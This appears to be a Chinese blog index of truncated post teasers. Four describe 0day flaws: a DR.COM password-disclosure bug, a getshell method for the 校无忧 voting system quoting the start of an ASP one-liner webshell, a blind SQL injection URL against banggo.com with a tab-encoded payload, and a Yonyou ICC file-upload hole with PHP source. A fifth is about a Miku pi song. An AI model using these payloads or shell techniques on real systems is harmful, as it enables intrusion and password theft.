-
DR.COM城市热点GetPassword-0day漏洞&exp
DR.COM城市热点宽带,很多城市都用这个吧?市区,政府,企业,运营商,大学等等。。都用这套软件提供接入宽带服务 最近研究了下,发现个漏洞,在DR.COM USS用户自助服务登录的WEB服务器 可以直接查看到指定ID用户的密码,也就是查询密...
-
校无忧投票系统利用0day
后台拿shell的方法呢, 在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功 一句话: view sourceprint?1 "%><%execute(request("...
-
美特斯邦威官方商城几个盲注
http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175%09and%09sl...
-
用友ICC网站客服系统任意文件上传漏洞
<?php/** * screenImagesSave.php * */require_once('../global.inc.php'); //get request.$ft = intval($_REQUEST['ft']); /...
-
初音未来背诵圆周率小数点后面1000位,圆周率洗脑歌(短版)
说长的都知足吧,这只是其中很短的一部分,原版是10000位圆周率,一共68分钟呢!!! 我在一个游戏里玩过这首歌,打了30分钟还不见停~~ 听一遍听到吐了~ 重口味,不喜勿入~...
